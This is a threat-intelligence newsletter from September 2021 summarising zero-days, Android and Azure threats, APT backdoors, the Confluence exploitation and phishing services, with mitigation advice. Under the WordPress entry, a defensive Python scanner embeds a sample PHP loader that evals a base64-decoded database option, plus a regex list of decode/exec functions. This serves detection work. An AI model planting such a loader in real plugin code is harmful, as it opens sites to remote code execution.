The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Android, APT, Confluence, Cloud, MSHTML, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag.
Trending Cyber News and Threat Intelligence
(published: September 13, 2021)
Researchers at Citizen Lab have identified two zero-day vulnerabilities in Apple’s operating systems iOS, OSX and WatchOS. The vulnerabilities are being tracked as “CVE-2021-30860” and “CVE-2021-30858”. The exploit, named FORCEDENTRY, targets Apple’s image rendering library and could enable arbitrary code execution from a malicious PDF file. Citizen Lab has attributed the associated attacks to the NSO Group, as it observed the Pegasus malware being installed via the FORCEDENTRY exploit.
Analyst Comment: Apple has already released a patch and is urging all users to update their systems immediately.
MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204
Tags: CVE-2021-30860, CVE-2021-30858, FORCEDENTRY, iOS, Mac, NSO Group, OSX, Vulnerability, Zero Day
(published: September 10, 2021)
ThreatFabric researchers have discovered a new Android banking trojan called S.O.V.A. The malware is still in the development and testing phase, and the threat actor is publicly advertising S.O.V.A. for trial runs targeting banks in order to improve its functionality. The trojan’s primary objective is to steal personally identifiable information (PII). This is conducted through overlay attacks, keylogging, man-in-the-middle attacks, and session cookie theft, among others. Other features, such as distributed denial-of-service (DDoS) and ransomware, are on S.O.V.A.’s project roadmap.
Analyst Comment: Always keep your mobile phone fully patched with the latest security updates. Only use official locations such as the Google Play Store / Apple App Store to obtain your software, and avoid downloading applications, even if they appear legitimate, from third-party stores. Furthermore, always review the permissions an app will request upon installation.
MITRE ATT&CK: [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Man-in-the-Middle - T1557 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Network Denial of Service - T1498 | [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Android, Banking trojan, S.O.V.A., Overlay, Keylogging, Cookies, Man-in-the-Middle
(published: September 9, 2021)
Unit 42 researchers identified and disclosed critical security issues in Microsoft’s Container-as-a-Service (CaaS) offering, Azure Container Instances (ACI). A malicious Azure user could have compromised the multitenant Kubernetes clusters hosting ACI, establishing full control over other users' containers. Researchers gave the vulnerability a specific name, Azurescape, highlighting its significance: it is the first cross-account container takeover in the public cloud.
Analyst Comment: Azurescape vulnerabilities could have allowed an attacker to execute code on other users' containers, steal customer secrets and images deployed to the platform, and abuse ACI's infrastructure processing power. Microsoft patched ACI shortly after the disclosure. Keep your cluster infrastructure up to date. Deploy policy enforcers to monitor and prevent suspicious activity in your clusters. If you were notified by Microsoft regarding this vulnerability, revoke any privileged credentials that were deployed to the platform before August 31st, 2021.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190
Tags: Azurescape, Cloud, Container-as-a-Service, CaaS, Azure Container Instances, ACI, Microsoft, Cross-Account, Container Takeover, Vulnerability
(published: September 9, 2021)
The SideWalk backdoor, which was discovered by ESET researchers in August 2021, has been attributed to the China-sponsored cyberespionage group called Grayfly (GREF, Wicked Panda). Symantec researchers believe that Grayfly is the cyberespionage arm of APT41, whereas Blackfly represents its cybercrime activity. The SideWalk campaign was observed targeting organizations located in Mexico, Taiwan, the United States, and Vietnam, with a particular focus on telecommunication companies. Targets were likely initially compromised via exploitation of multiple vulnerabilities affecting public-facing servers, including Microsoft Exchange and MySQL servers. Once SideWalk was installed, the group deployed a custom version of the open-source credential-stealing tool Mimikatz.
Analyst Comment: Information-motivated threat actors will go to great lengths to disguise and hide their activity. Backdoors that are frequently deployed in cyberespionage campaigns will remain dormant for some time before conducting malicious activity, and then proceed to steal large amounts of data at a chosen time. Therefore, it is important to have detection and identification capabilities in place (such as Anomali Match, to quickly search your infrastructure for known IOCs) in combination with a TIP (such as Anomali ThreatStream) to ingest and add context to IOCs and threat actors.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Exploitation for Credential Access - T1212 | [MITRE ATT&CK] Software Deployment Tools - T1072
Tags: Cyberespionage, Grayfly, GREF, Wicked Panda, SideWalk loader
(published: September 8, 2021)
Sucuri researchers discovered a new, active, evasive modular campaign in which malware was injected into multiple WordPress environments. The malware redirects visitors by calling malicious files hosted on third-party infected websites. The infection stores itself as encoded content in the database and is called through randomly named functions littered throughout plugin files using the very common WordPress function "get_option". The payload is extracted from a database injection in wp_options, has the ability to bypass login authentication to access the admin panel, and comes with a built-in eval() backdoor giving remote code execution access.
Analyst Comment: Organizations should regularly monitor their web assets to detect possible exploitation by threat actors. To mitigate such risks you can lock down your wp-admin dashboard, use long and complex passwords, and consider additional firewall solutions.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140
Tags: Get_Option, WordPress, Compromised Websites
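A defender-side check for the loader pattern described above (an option value read with get_option and fed into decode/eval functions from an oddly named plugin function). This is an added example, not Sucuri's code; the plugin source it scans is a constructed sample, and the option name `_tr_cache_9f3a` is an invented placeholder.

```python
"""Flag plugin functions where a get_option() value reaches eval-like PHP code."""
import re

# Constructed sample: one legitimate settings reader beside an injected loader.
SAMPLE_PLUGIN_PHP = r'''<?php
function myplugin_settings() {
    $opts = get_option('myplugin_settings', array());
    return $opts;
}
function _x9f3a() {
    $p = get_option('_tr_cache_9f3a');
    if ($p) { eval(base64_decode($p)); }
}
add_action('init', '_x9f3a');
'''

# Functions that decode or execute a string; their presence next to get_option is the signal.
DECODE_OR_EXEC = re.compile(
    r'\b(eval|base64_decode|gzinflate|str_rot13|assert|create_function)\s*\(')
GET_OPTION = re.compile(r"\bget_option\s*\(\s*['\"]([^'\"]*)['\"]")


def split_functions(php):
    """Yield (name, body) for each PHP function, using brace matching for the body."""
    for m in re.finditer(r'\bfunction\s+(\w+)\s*\([^)]*\)\s*\{', php):
        depth, i = 1, m.end()
        while i < len(php) and depth:
            depth += {'{': 1, '}': -1}.get(php[i], 0)
            i += 1
        yield m.group(1), php[m.end():i - 1]


def find_suspicious_loaders(php):
    """Return [(function_name, option_name, [decode/exec calls])] for bodies that
    both read a wp_options entry and pass data through a decode/exec function."""
    hits = []
    for name, body in split_functions(php):
        option_names = GET_OPTION.findall(body)
        exec_calls = sorted(set(DECODE_OR_EXEC.findall(body)))
        if option_names and exec_calls:
            hits.append((name, option_names[0], exec_calls))
    return hits


if __name__ == "__main__":
    for fn, opt, calls in find_suspicious_loaders(SAMPLE_PLUGIN_PHP):
        print(f"suspicious: {fn}() reads option '{opt}' and calls {calls}")
```

The same DECODE_OR_EXEC pattern can be run over option_value in wp_options to locate the stored payload itself; a hit gives the option_name to inspect and remove.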
(published: September 7, 2021)
CVE-2021-40444 is a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Several researchers are credited with reporting this vulnerability to Microsoft, which is aware of targeted attacks that attempt to exploit it via malicious Microsoft Office documents. A threat actor could craft a malicious ActiveX control, placed in a file, that is activated via the browser rendering engine. This vulnerability may affect a large number of systems, as many Microsoft applications use MSHTML to render HTML content. The attack complexity is low and no prior privileges are required, but user interaction is required to open the malicious document.
Analyst Comment: As of September 12, 2021, a security patch for this vulnerability was still not available, while a proof-of-concept (PoC) had been released and threat actors had started sharing working exploits on hacker forums. Microsoft recommends implementing mitigation and workaround measures. Until a patch is available, it is recommended to disable ActiveX control components. Users should not be granted administrative privileges unless required. Open documents from the internet in Protected View or Application Guard for Office, and if an unknown document prompts users to “Enable Editing”, they should be advised against doing so unilaterally.
MITRE ATT&CK: [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] System Information Discovery - T1082 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Software Packing - T1045 | [MITRE ATT&CK] Native API - T1106 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Access Token Manipulation - T1134 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Phishing - T1566
Tags: CVE-2021-40444, MSHTML, ActiveX, Windows, Microsoft, MS Office, RCE, Spearphishing
(published: September 7, 2021)
Jenkins, a leading open source automation server, had its Confluence service successfully attacked through the Confluence CVE-2021-26084 exploit. A remote code execution vulnerability, registered as “CVE-2021-26084,” has been exploited by threat actors to install a Monero cryptocurrency miner on an internal server of the Jenkins project. Mass exploitation of this Confluence vulnerability is ongoing and expected to accelerate. The vulnerability originates from the use of Object-Graph Navigation Language (OGNL) in Confluence’s tag system. It permits the injection of OGNL code and thus execution of arbitrary code on computers with Confluence Server or Confluence Data Center installed. In some cases, even an unauthenticated user can exploit the vulnerability (if the option “Allow people to sign up to create their account” is active). This vulnerability does not affect Confluence Cloud users.
Analyst Comment: As a large number of vulnerable Confluence instances remain exposed online, the U.S. Cyber Command has issued a special alert regarding CVE-2021-26084. Atlassian considers this vulnerability critical. Administrators should apply the patch that Atlassian has made available since August 25, 2021.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Resource Hijacking - T1496
Tags: CVE-2021-26084, Confluence, XMRig, Monero, USA, Jenkins, Cryptojacking, RCE, OGNL, Atlassian
(published: September 7, 2021)
Another alleged member of the TrickBot gang has been apprehended, this time while trying to leave South Korea. The Russian national, who is an alleged developer of the notorious crimeware, reportedly had been trapped in South Korea since February 2020 due to COVID-19 travel restrictions. He is identified only as "Mr A" and is believed to have worked as a web browser developer for the TrickBot crime syndicate while he lived in Russia in 2016. The botnet was used to facilitate ransomware attacks across the US throughout 2020.
Analyst Comment: Despite multiple arrests and an October 2020 attempt to disrupt TrickBot infrastructure, it continued to adapt and launch new malware campaigns targeting organizations worldwide. Defence-in-depth helps mitigate multi-stage, evolving malware threats such as this one.
MITRE ATT&CK: [MITRE ATT&CK] OS Credential Dumping - T1003
Tags: TrickBot, Alla Witte, Banking And Finance, Ransomware, North America, Russia, South Korea
(published: September 6, 2021)
Brian Krebs updated the profile of FudCo, a Pakistani threat group that targets a number of banks, financial institutions, and other organizations by selling spam tools and a range of services for crafting, hosting and deploying malicious email. The group sells phishing templates; products that bundle malware with benign Office documents; “scampage hosting” for phishing sites; spam distribution tools like HeartSender; and software designed to help spammers route their malicious email through compromised sites, accounts and services in the cloud. FudCo has been using a shared cybercriminal identity, “Saim Raza,” which for the past decade has promoted a popular spamming and phishing service called “Fudtools,” “Fudpage,” “Fudsender,” etc. on various cybercrime sites and forums. In 2015, the group was hiding behind a fake “branding company” website, “The Manipulaters”; in 2021, FudCo was found behind a shell software development company in Lahore called We Code Solutions.
Analyst Comment: Researchers from Scylla Intel briefed US prosecutors on FudCo’s activities, but no action has been taken since, possibly due to the difficulty of documenting all the various FudCo activities. Organizations should monitor for new phishing templates targeting them. Anomali clients can subscribe to domain monitoring services that help detect new typosquatting domains.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566
Tags: FudCo, Fudtools, Fudpage, Fudsender, Saim Raza, The Manipulaters, We Code Solutions, Phishing, Phishing Templates, HeartSender, Scampage Hosting, Rameez Shahzad, Bilal Waddaich, Burhan Ul Haq, Omer Fareed, Pakistan, Karachi, Lahore